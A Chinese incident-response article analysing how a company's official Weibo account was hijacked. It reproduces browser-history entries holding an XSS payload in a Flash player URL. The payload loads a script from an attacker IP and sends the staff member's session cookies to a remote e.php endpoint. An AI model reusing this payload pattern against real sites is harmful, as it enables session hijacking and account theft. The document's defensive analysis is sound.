“企業(yè)應(yīng)急響應(yīng)和反滲透”之真實(shí)案例分析

2015-08-26 14:20:04 大云網(wǎng)　點(diǎn)擊量：評(píng)論 (0)

峰會(huì)上講過(guò)的議題，整理成文章，以供大家批評(píng)指正。對(duì)于企業(yè)應(yīng)急響應(yīng)，我想只要從事安全工作的同學(xué)都有接觸，我也一樣，在甲方乙方工作的這幾年，處理過(guò)不少應(yīng)急響應(yīng)的事件，但是每個(gè)人都會(huì)有自己做事的方法，在

0x04 案例之官微帳號(hào)被盜

這是第一個(gè)案例，是官方微博帳號(hào)被盜的案例。首先看下面兩張圖片：

某天我們的一個(gè)官方帳號(hào)突發(fā)連續(xù)發(fā)兩條不正常的微博內(nèi)容，看到第一條的時(shí)候還以為是工作人員小手一抖，test 到手，以為是工作人員的誤操作，但是看到第二條微博的時(shí)候就已經(jīng)能夠判斷帳號(hào)出了問(wèn)題，具體是什么問(wèn)題只能通過(guò)后面的分析才知道。

但是肯定的是這不是工作人員進(jìn)行的操作，一方面在這種重要帳號(hào)的操作上有一些制度，其次是發(fā)布的內(nèi)容也比較明顯，根據(jù)發(fā)布的時(shí)間通過(guò)后臺(tái)系統(tǒng)分析，該帳號(hào)有通過(guò) cookie 在非公司 IP 進(jìn)行過(guò)登錄，但是我們的 cookie 是通過(guò) httponly 進(jìn)行保護(hù)的，how?

接下來(lái)鎖定那個(gè)時(shí)間段操作過(guò)官方微博帳號(hào)同事的工作電腦，在其使用的火狐瀏覽器中發(fā)現(xiàn)有下面連續(xù)的幾條訪問(wèn)記錄：

==================================================
URL : http://t.cn/zW*bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL : http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://t.cn/zW*bUQ
==================================================
==================================================
URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript：%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://50.116.13.242/index.php
Title : player.swf (application/x-shockwave-flash 對(duì)象)
==================================================
==================================================
URL : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript：%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})
==================================================

對(duì)上面的訪問(wèn)記錄我想我不需要做太多的解釋。在官方微博帳號(hào)的私信里面有 http://t.cn/zW*bUQ 的私信記錄。

到這里就已經(jīng)能夠還原整個(gè)攻擊場(chǎng)景了

工作人員收到一條私信，并且打開(kāi)了

私信鏈接是一個(gè) xss 漏洞的鏈接

攻擊代碼利用另外一個(gè)業(yè)務(wù)的 apache httponly cookie 泄露漏洞竊取到 cookie

事后我們修復(fù)了這次攻擊中的漏洞，同時(shí)修復(fù)了業(yè)務(wù)中同類的安全漏洞，同時(shí)加強(qiáng)了員工安全意識(shí)，并且增加了相應(yīng)的帳號(hào)安全策略。

最后我們通過(guò)后臺(tái)的 IP 和郵箱等數(shù)據(jù)定位到了攻擊者，在整個(gè)攻擊中也并沒(méi)有惡意，他也把相關(guān)的漏洞和攻擊過(guò)程提交到烏云漏洞報(bào)告平臺(tái)，大家可以去主站找找這個(gè)漏洞，我這里就不貼相關(guān)鏈接了。